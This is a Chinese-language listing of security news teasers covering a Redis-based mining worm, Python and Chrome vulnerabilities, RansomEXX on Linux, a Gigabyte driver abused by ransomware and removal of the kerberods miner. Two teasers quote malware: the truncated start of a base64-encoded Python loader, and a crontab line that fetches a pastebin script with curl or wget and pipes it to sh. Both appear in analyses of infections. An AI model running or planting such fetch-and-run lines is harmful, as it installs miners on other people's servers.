• 基于Redis未授权访问的挖矿蠕虫分析

    日期:

    0x01 攻击方式 利用的是通用漏洞入侵服务器并获得相关权限,从而植入挖矿程序再进行隐藏。 通过对脚本的分析,发现黑客主要是利用Redis未授权访问漏洞进行入侵。脚本里有个python函数。 import base64;exec(base64.b64decode(I2NvZGluZzogdXRmLTgKaW1wb3J0IH...

  • 以太坊矿工强烈反对变革,威胁发动 51% 攻击

    日期:

    以太坊矿工强烈反对变革,威胁发动 51% 攻击 以太坊创始人 Vitalik Buterin 强力推动的新提案 EIP-1559 被认为将让整个以太坊生态系统受益,但代价是大幅减少矿工们的收入,因此遭到了部分矿工们的强烈反对。而大型矿池由于有大量的 ETH 储蓄,因此可以从该...

  • Python 被爆大 Bug,攻击者可远程代码执行漏洞!

    日期:

    近日,Python 软件基金会(PSF)释出 Python3.8.8 和 3.9.2 版本,该版本主要修复了两个值得注意的安全漏洞,其中一个名为CVE-2021-3177的漏洞容易被攻击者远程利用,基于代码执行可让计算机脱机。 乍一看,让计算机脱机并不是什么大事,不过,倘若真的被有...

  • Google 再次修复 Chrome 零日漏洞

    日期:

    Google 于 2 月 5 日发布了针对 Windows、Mac 和 Linux 用户的 Chrome 小版本更新,更新后 Chrome 的版本号来到了 88.0.4324.150。在这个版本中 Google 解决了一个已被利用的零日安全漏洞(zero-day vulnerability)。 这个被 Google 评定为高度严重的漏洞被...

  • Redis Centos镜像漏洞修复

    日期:

    Redis Centos镜像漏洞修复以及升级内核版本 linux内核介绍:https://www.cnblogs.com/still-smile/p/11597620.html redis当前所有的Centos镜像默认自带的ssh 版本过低,所以会出现以下漏洞。 1 OpenSSH 命令注入漏洞(CVE-2020-15778) 2 OpenSSH 安全漏洞(CVE-...

  • Linux 更安全?大规模 Windows 勒索软件移植至 Linux

    日期:

    安全公司 Kaspersky 日前 发现 了一个新的文件加密木马,它是 ELF 可执行文件,旨在对基于 Linux 的操作系统计算机上的数据进行加密。 Kaspersky 经过初步分析,发现遇到的实际是已知勒索软件 RansomEXX 的 Linux 构建版本。 RansomEXX 是年初开始活跃的一种...

  • Linux FAT 文件系统预读缺陷,补丁提升 7 倍性能

    日期:

    Linux 内核现在已经增加了对 exFAT 的支持,同时它也没有放弃维护原有 FAT 文件系统驱动,甚至现在从邮件列表上看,FAT 性能方面可能会有大幅提升。 开发 Tux3 文件系统而闻名的 OGAWA Hirofumi 在邮件列表中提到了目前 Linux FAT 文件系统的预读取处理有瑕疵...

  • 勒索软件利用 Windows 驱动程序漏洞关闭防病毒软件

    日期:

    安全公司 Sophos 警告说,新的勒索软件攻击使用了易受攻击的技嘉驱动程序,试图闯入 Windows 系统,然后禁用正在运行的安全软件。该攻击基于 2018 年在技嘉驱动程序中发现的安全漏洞,该安全漏洞在 CVE-2018-19320 中有详细说明。 该驱动程序在技嘉确认该错误...

  • 2020 年勒索软件将继续流行

    日期:

    勒索软件将在 2020 年继续困扰组织,因为网络加密恶意软件攻击背后的网络罪犯几乎没有被抓住的风险。因此,对攻击者而言,风险很小,但潜在的回报却很大。 在过去的一年中,有许多勒索软件攻击的例子,已经有受害者屈服于攻击者的勒索要求,他们通常支付数十...

  • kerberods挖矿病毒查杀及分析(crontab 挖矿 curl -fsSL https://pastebin.com/raw)

    日期:

    一. 症状及表现 CPU使用率异常高,外出流量异常 crontab异常,存在如下定时任务(基本上就可以确定了) [root@it.net.cn ~]# crontab -l */15 * * * * (curl -fsSL https://pastebin.com/raw/xmxHzu5P||wget -q -O- https://pastebin.com/raw/xmxHzu5P)|sh 在...